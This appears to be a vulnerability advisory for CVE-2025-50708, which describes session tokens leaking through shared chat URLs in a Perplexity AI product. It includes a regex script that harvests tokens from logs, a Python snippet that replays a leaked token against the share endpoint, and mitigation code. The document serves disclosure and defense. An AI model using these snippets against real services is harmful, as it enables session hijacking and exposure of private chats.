Sensitive Information Disclosure in Perplexity AI GPT-4 (v2.51.0)
Overview
A critical vulnerability, CVE-2025-50708, has been identified in Perplexity AI GPT-4 version 2.51.0, allowing remote attackers to obtain sensitive information via the token component in shared chat URLs. This flaw exposes confidential data, including session tokens, user identifiers, or other authentication-related details embedded in shared links.
The vulnerability was publicly disclosed on July 18, 2025, and affects users who share chat session URLs containing embedded tokens. Attackers could exploit this issue to hijack sessions, impersonate users, or gain unauthorized access to private conversations.
Technical Details
Root Cause
The vulnerability stems from embedding sensitive data directly in shareable chat URLs. When a user generates a shareable link, the system places a session token or other sensitive metadata in the URL's query string. Because URLs are routinely recorded in:
- Web server logs
- Browser history
- Proxy/cache systems
- Third-party analytics services
An attacker with access to these logs could extract the token and use it to impersonate the victim.
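For illustration, a token-bearing share link that passes through an ordinary web server leaves an access-log entry similar to the following (standard Common Log Format; the client address, timestamp, and sizes are placeholders):
203.0.113.5 - - [18/Jul/2025:10:42:07 +0000] "GET /share/chat?token=ABC123XYZ HTTP/1.1" 200 5120
Anyone who can read such logs can recover the token without ever touching the victim's device.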
Attack Scenario
- Victim shares a Perplexity AI chat session (e.g., https://perplexity.ai/share/chat?token=ABC123XYZ).
- The URL is logged in an intermediate system (e.g., corporate proxy, email server, or analytics tracker).
- Attacker retrieves the token from logs or intercepted traffic.
- Attacker loads the URL, gaining access to the victim’s chat session without authentication.
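The final step can be illustrated with a short replay sketch. The endpoint and parameter name below mirror the example URL above and are assumptions for illustration, not a confirmed API:
import requests

# Hypothetical replay of a leaked token against the share endpoint shown above.
leaked_token = "ABC123XYZ"
response = requests.get(
    "https://perplexity.ai/share/chat",
    params={"token": leaked_token},
    timeout=10,
)
# If the token alone authorizes access, the response body contains the victim's chat.
print(response.status_code, len(response.text))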
Proof of Concept (PoC)
A simple Python script simulating token extraction from a log file:
import re
# Sample log file containing shared Perplexity AI URLs
log_data = """
[18/Jul/2025] User shared: https://perplexity.ai/share/chat?token=ABC123XYZ
[18/Jul/2025] User shared: https://perplexity.ai/share/chat?token=DEF456UVW
"""
# Extract tokens using regex
tokens = re.findall(r'token=([A-Za-z0-9]+)', log_data)
print("Extracted tokens:", tokens)
# Output: ['ABC123XYZ', 'DEF456UVW']
An attacker could then use these tokens to impersonate users.
Impact
- Session Hijacking: Attackers can take over active sessions.
- Unauthorized Data Access: Exposure of private chat logs.
- Phishing & Social Engineering: Stolen tokens could be used in targeted attacks.
Mitigation & Fixes
Perplexity AI has released a patch in a subsequent version. Users should:
- Upgrade to the latest version of Perplexity AI GPT-4.
- Avoid sharing sensitive chat links via insecure channels.
Developers should:
- Remove tokens from URLs and use secure session management (a minimal sketch follows this list).
- Issue short-lived share tokens that expire after use.
- Use HTTP-only, Secure, and SameSite cookies for session handling.
- Audit logging mechanisms to prevent token leakage.
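A minimal sketch of the first two recommendations, assuming a server-side store and hypothetical helper names (illustrative only, not Perplexity AI's actual implementation): the share URL carries nothing but a random, single-use identifier with a short lifetime, while the user's own session stays in an HTTP-only cookie.
import secrets
import time

# Illustrative in-memory store; a real service would use a database or cache.
SHARE_STORE = {}
SHARE_TTL_SECONDS = 600  # hypothetical 10-minute lifetime

def create_share_link(chat_id):
    """Generate a share URL containing only an opaque, short-lived identifier."""
    share_id = secrets.token_urlsafe(32)  # unguessable, carries no session data
    SHARE_STORE[share_id] = {
        "chat_id": chat_id,
        "expires_at": time.time() + SHARE_TTL_SECONDS,
    }
    return f"https://perplexity.ai/share/{share_id}"  # no session token in the URL

def resolve_share_link(share_id):
    """Return the chat ID if the identifier is valid and unexpired, else None."""
    entry = SHARE_STORE.pop(share_id, None)  # single-use: consumed on first access
    if entry is None or entry["expires_at"] < time.time():
        return None
    return entry["chat_id"]
Because the identifier only maps to data held server-side, a leaked link exposes at most one expired, single-use pointer rather than a reusable session credential.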
Conclusion
CVE-2025-50708 highlights the risks of embedding sensitive data in URLs. Organizations must ensure proper token handling and adopt secure sharing mechanisms. Users should remain cautious when sharing AI-generated chat links and verify that they are using patched software versions.
For further updates, refer to Perplexity AI’s security advisory or the CVE database (MITRE).